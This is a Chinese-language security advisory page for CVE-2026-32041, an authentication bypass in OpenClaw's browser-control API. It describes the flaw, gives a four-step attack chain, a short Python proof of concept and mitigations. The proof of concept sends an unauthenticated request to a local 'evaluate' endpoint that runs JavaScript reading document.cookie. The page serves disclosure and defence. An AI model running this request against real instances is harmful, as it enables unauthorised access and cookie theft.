IPBUF安全漏洞报告
English
CVE-2026-32041 CVSS 6.9 中危

CVE-2026-32041 OpenClaw认证绕过漏洞

披露日期: 2026-03-19

漏洞信息

漏洞编号
CVE-2026-32041
漏洞类型
认证绕过
CVSS评分
6.9 中危
攻击向量
本地 (AV:L)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
OpenClaw

相关标签

认证绕过OpenClawSSRF本地漏洞CVSS:3.1/6.9

漏洞概述

OpenClaw 2026.3.1之前的版本存在认证绕过漏洞。由于未能妥善处理启动时的认证引导错误,导致浏览器控制路由在无认证状态下暴露。攻击者可利用本地进程或SSRF路径绕过验证,访问敏感接口并执行高权限操作,严重影响系统机密性与完整性。

技术细节

该漏洞的根源在于OpenClaw应用程序在启动阶段的错误处理逻辑不严密。具体而言,当OpenClaw尝试初始化认证服务(如加载密钥或连接身份提供商)遭遇失败时,程序未能进入安全的错误状态或拒绝后续请求。相反,它默认允许路由保持开放,特别是用于控制浏览器的敏感API端点。攻击者利用这一逻辑漏洞,无需提供任何有效的身份凭证(PR:N),即可直接向这些端点发送HTTP请求。由于攻击主要针对本地环境(AV:L),攻击者可能通过同一台主机上的恶意进程,或者利用Web应用中的SSRF漏洞向本地回环地址(localhost/127.0.0.1)发起请求。一旦请求成功,攻击者可以调用具备代码评估能力的接口,执行任意JavaScript代码,进而读取敏感数据(C:H)、篡改页面内容(I:H)甚至导致部分服务拒绝(A:L)。

攻击链分析

STEP 1
1. 识别目标状态
攻击者确认目标OpenClaw实例在启动过程中发生了认证初始化错误,导致系统处于异常运行状态。
STEP 2
2. 定位暴露接口
攻击者扫描或通过已知信息定位到未受保护的浏览器控制路由,特别是具备evaluate功能的API端点。
STEP 3
3. 发起未认证请求
攻击者通过本地进程或利用SSRF漏洞,向目标端点发送未经身份验证的恶意请求。
STEP 4
4. 执行恶意操作
系统处理请求并执行操作,攻击者借此窃取敏感信息或篡改数据,完成攻击。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # PoC for CVE-2026-32041: Unauthenticated Browser Control Access # Target: OpenClaw instance with failed auth bootstrap TARGET_URL = "http://127.0.0.1:8080/api/browser/evaluate" # Example endpoint # Payload to execute JavaScript in the browser context payload = { "script": "document.cookie" } print(f"[*] Attempting to access {TARGET_URL} without authentication...") try: # Send POST request without Authorization header response = requests.post(TARGET_URL, json=payload, timeout=10) if response.status_code == 200: print("[+] Vulnerability confirmed! Access granted without credentials.") print("[+] Response data:", response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}")

影响范围

OpenClaw < 2026.3.1

防御指南

临时缓解措施
在未升级版本前,建议严格限制对OpenClaw服务的网络访问,仅允许本地可信流量。若检测到启动时认证引导失败,应立即停止服务进程。同时,部署网络监控规则,检测对内部浏览器控制API的异常访问请求,以减少潜在的攻击面。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表